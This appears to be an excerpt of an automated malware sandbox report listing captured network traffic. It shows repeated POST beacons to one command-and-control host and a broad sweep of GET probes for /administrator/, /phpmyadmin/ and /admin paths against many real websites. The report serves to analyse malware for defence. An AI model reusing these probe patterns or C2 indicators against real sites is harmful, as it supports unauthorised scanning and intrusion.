                Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hcpsryfdfswb.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 279Host: selebration17io.io
                Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jojqjqewwnyplbq.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 196Host: selebration17io.io
                Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fejbifbnqes.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 351Host: selebration17io.io
                Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ofbjqsuaveuwo.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 117Host: selebration17io.io
                Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://whlyawtijntebx.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 305Host: selebration17io.io
                Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://cuhiokodwvirqcxc.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 236Host: selebration17io.io
                Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fckyfgpcdvk.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 304Host: selebration17io.io
                Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hkijxgsqrcqnlfn.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 299Host: selebration17io.io
                Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qpvffufpuvb.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 196Host: selebration17io.io
                Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://porpskhbqsfeiw.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 157Host: selebration17io.io
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: eei.uniandes.edu.coAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: app.plex.tvAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: accounts.faceit.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: pl-pl.facebook.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: chainmine.ioAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: ucivirtual.uci.edu.mxAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: store.steampowered.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: v.xsanime.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: accounts.google.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: money-farm.ccAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: m.codere.com.coAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: hi-in.facebook.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: es-la.facebook.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: mojadovera.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: ucivirtual.uci.edu.mxAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://ucivirtual.uci.edu.mx/administrator/
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: rage.mpAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: academico.um.edu.mxAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: accounts.snapchat.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: cloud.simplify3d.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: upsconline.nic.inAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: ag.ufa9999.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: naukrigulf.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: sport.autoplay.cloudAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: api.cmrsanmartin.ziz.clAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: poligrafosecuador.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: sistemas.pa.gov.brAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: pxndx-mcr.boletia.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: account.mojang.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: secure.vexcorp.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: gitam.zoom.usAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: netizion.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: pt.secure.imvu.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: pan.baidu.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: ag.ufa9999.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://ag.ufa9999.com/administrator/
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: instructory.netAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: analvids.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: sigapbanjarmasin.infoAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: naukrigulf.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://naukrigulf.com/administrator/
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: login.adf.lyAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: casinocontroller.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: steamcommunity.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: web.facebook.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: kwyk.frAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: nossoplayer.meAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: account.booking.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: uh.isAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: ssc.nic.inAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: pt.secure.imvu.comAccept: */*Accept-Encoding: deflate, gzipCookie: osCsid=043e21066f59341f79d55d583419ce99User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://pt.secure.imvu.com/administrator/
                Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: secure.vexcorp.comAccept: */*Accept-Encoding: deflate, gzipCookie: expiry_partner=; lander_type=forwarder; caf_ipaddr=81.181.57.74; _policy={"restricted_market":false,"tracking_market":"none"}; country=RO; city=""User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://secure.vexcorp.com/administrator/
                Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: pan.baidu.comAccept: */*Accept-Encoding: deflate, gzipCookie: PANPSC=; BAIDUID=1B2A58FE47332A09C358E035BAC35AD0:FG=1User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://pan.baidu.com/administrator/
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: testconnect.garena.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: nuevopacto.runacode.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: accounts.faceit.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: rage.mpAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: lookaside.fbsbx.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: store.steampowered.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /admin.php HTTP/1.1Host: accounts.google.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: th-th.facebook.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /admin.php HTTP/1.1Host: loopex.ioAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /admin.php HTTP/1.1Host: genshin.mihoyo.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /admin.php HTTP/1.1Host: store.steampowered.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /admin HTTP/1.1Host: accounts.google.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /admin HTTP/1.1Host: connect.appen.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /admin.php HTTP/1.1Host: midetuvelocidad.claro.com.peAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: warriorplus.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: ro.bongacams.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: multiideas.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: tiktok.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: 3fba-180-252-166-236.ngrok.ioAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: accounts.binance.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: us04web.zoom.usAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: opsu.terna.netAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: followerstiktok.xyzAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: zarkana2.roAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: foros.netAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: cjdropshipping.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: multiideas.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: lookaside.fbsbx.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: nuevopacto.runacode.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: unknown; TCP traffic detected without corresponding DNS query: 185.172.128.19
                Source: unknown; TCP traffic detected without corresponding DNS query: 62.102.148.68
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: mega.nzAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: aeaaamorim.inovarmais.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: oferta.senasofiaplus.edu.coAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: store.steampowered.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: virtuadopt.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: gitam.zoom.usAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: upsconline.nic.inAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/?locale=es_LA&_rdr HTTP/1.1Host: m.facebook.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: pxndx-mcr.boletia.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: login2.innova.puglia.itAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /en HTTP/1.1Host: genshin.mihoyo.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: app.plex.tvAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: srienlinea.sri.gob.ecAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: account.mojang.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: pxndx-mcr.boletia.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: sistemas.pa.gov.brAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: academico.um.edu.mxAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: store.steampowered.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: accounts.google.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: ssc.nic.inAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: pl-pl.facebook.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: login.adf.lyAccept: */*Accept-Encoding: deflate, gzipCookie: FLYSESSID=r2c0p26i5n0hv6h164082hcuoeUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/?locale=hi_IN&_rdr HTTP/1.1Host: m.facebook.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: lookaside.fbsbx.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: accounts.snapchat.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: yellosa.co.zaAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: analvids.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
